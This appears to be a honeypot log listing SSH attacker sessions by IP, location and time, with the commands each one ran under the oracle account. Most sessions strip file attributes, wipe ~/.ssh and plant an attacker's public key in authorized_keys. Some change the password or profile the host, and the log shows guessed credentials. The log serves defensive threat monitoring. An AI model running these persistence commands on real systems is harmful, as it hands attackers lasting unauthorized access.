$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "1234qwer\neEdJrQTyr4ua\neEdJrQTyr4ua"|passwd|bash
$ Enter new UNIX password:
$ echo "1234qwer\neEdJrQTyr4ua\neEdJrQTyr4ua\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ silent_monsoon_sol (143.110.251.21) โ€” Bengaluru, India ยท 1 session ยท 2 cmds
2026-07-05 04:41 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ murky_satay_sol (202.184.156.3) โ€” Cyberjaya, Malaysia ยท 1 session ยท 2 cmds
2026-07-05 04:40 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ ironclad_wraith_sol (181.188.237.214) โ€” Latacunga, Ecuador ยท 1 session ยท 2 cmds
2026-07-05 04:39 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ lurking_rogue_sol (103.59.163.132) โ€” Yangon, Myanmar ยท 1 session ยท 2 cmds
2026-07-05 04:38 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ ironclad_ghost_sol (202.79.29.108) โ€” Phnom Penh, Cambodia ยท 1 session ยท 2 cmds
2026-07-05 04:38 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ stoic_tango_sol (186.148.224.183) โ€” Boulogne Sur Mer, Argentina ยท 1 session ยท 2 cmds
2026-07-05 04:37 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ placid_volcano_sol (36.69.160.99) โ€” Medan, Indonesia ยท 1 session ยท 2 cmds
2026-07-05 04:37 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ unhinged_burger_sol (23.95.8.134) โ€” Buffalo, United States ยท 1 session ยท 2 cmds
2026-07-05 04:37 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ velvet_pistachio_sol (85.185.201.10) โ€” Ardabil, Iran ยท 1 session ยท 2 cmds
2026-07-05 04:36 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ brisk_boba_sol (114.34.106.146) โ€” New Taipei City, Taiwan ยท 1 session ยท 2 cmds
2026-07-05 04:35 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ murky_boba_sol (61.223.116.74) โ€” Changhua, Taiwan ยท 1 session ยท 2 cmds
2026-07-05 04:33 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ grumpy_sundarban_sol (103.163.117.83) โ€” Dhaka, Bangladesh ยท 1 session ยท 2 cmds
2026-07-05 04:32 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ aloof_husk_sol (157.10.100.12) โ€” Patan, Nepal ยท 1 session ยท 2 cmds
2026-07-05 04:32 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ spectral_delta_sol (144.79.133.252) โ€” Dhaka, Bangladesh ยท 1 session ยท 2 cmds
2026-07-05 04:31 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ cryptic_savanna_sol (102.210.148.92) โ€” Johannesburg, South Africa ยท 1 session ยท 2 cmds
2026-07-05 04:31 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ sullen_mekong_sol (103.172.236.241) โ€” ฤแป‘ng ฤa, Vietnam ยท 1 session ยท 2 cmds
2026-07-05 04:30 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ ironclad_acai_sol (177.11.196.84) โ€” Feliz, Brazil ยท 3 sessions ยท 6 cmds
2026-05-07 01:23 EDT ยท as oracle/1234qwer, oracle/Welcome1, oracle/oracle@123456
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—3
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—3
โ†ณ SSH key persistence
๐ŸŽญ listless_wraith_sol (8.243.73.162) โ€” Campo de la Cruz, Colombia ยท 1 session ยท 2 cmds
2026-07-05 04:27 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ vapor_kimchi_sol (222.110.147.58) โ€” Eunpyeong-gu, South Korea ยท 1 session ยท 2 cmds
2026-07-05 04:26 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ silent_bamboo_sol (160.191.244.158) โ€” ฤแป‘ Sฦกn, Vietnam ยท 1 session ยท 2 cmds
2026-07-05 04:24 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ grumpy_kudu_sol (102.210.149.105) โ€” Johannesburg, South Africa ยท 2 sessions ยท 4 cmds
2026-05-07 13:51 EDT ยท as oracle/1234qwer, oracle/tft105
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ glitchy_pho_sol (103.172.236.15) โ€” ฤแป‘ng ฤa, Vietnam ยท 1 session ยท 2 cmds
2026-07-05 04:23 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ frantic_durian_sol (103.189.235.93) โ€” Singapore, Singapore ยท 1 session ยท 2 cmds
2026-07-05 04:23 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rogue_echo_sol (41.93.28.23) โ€” Dar es Salaam, Tanzania ยท 1 session ยท 2 cmds
2026-07-05 04:23 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
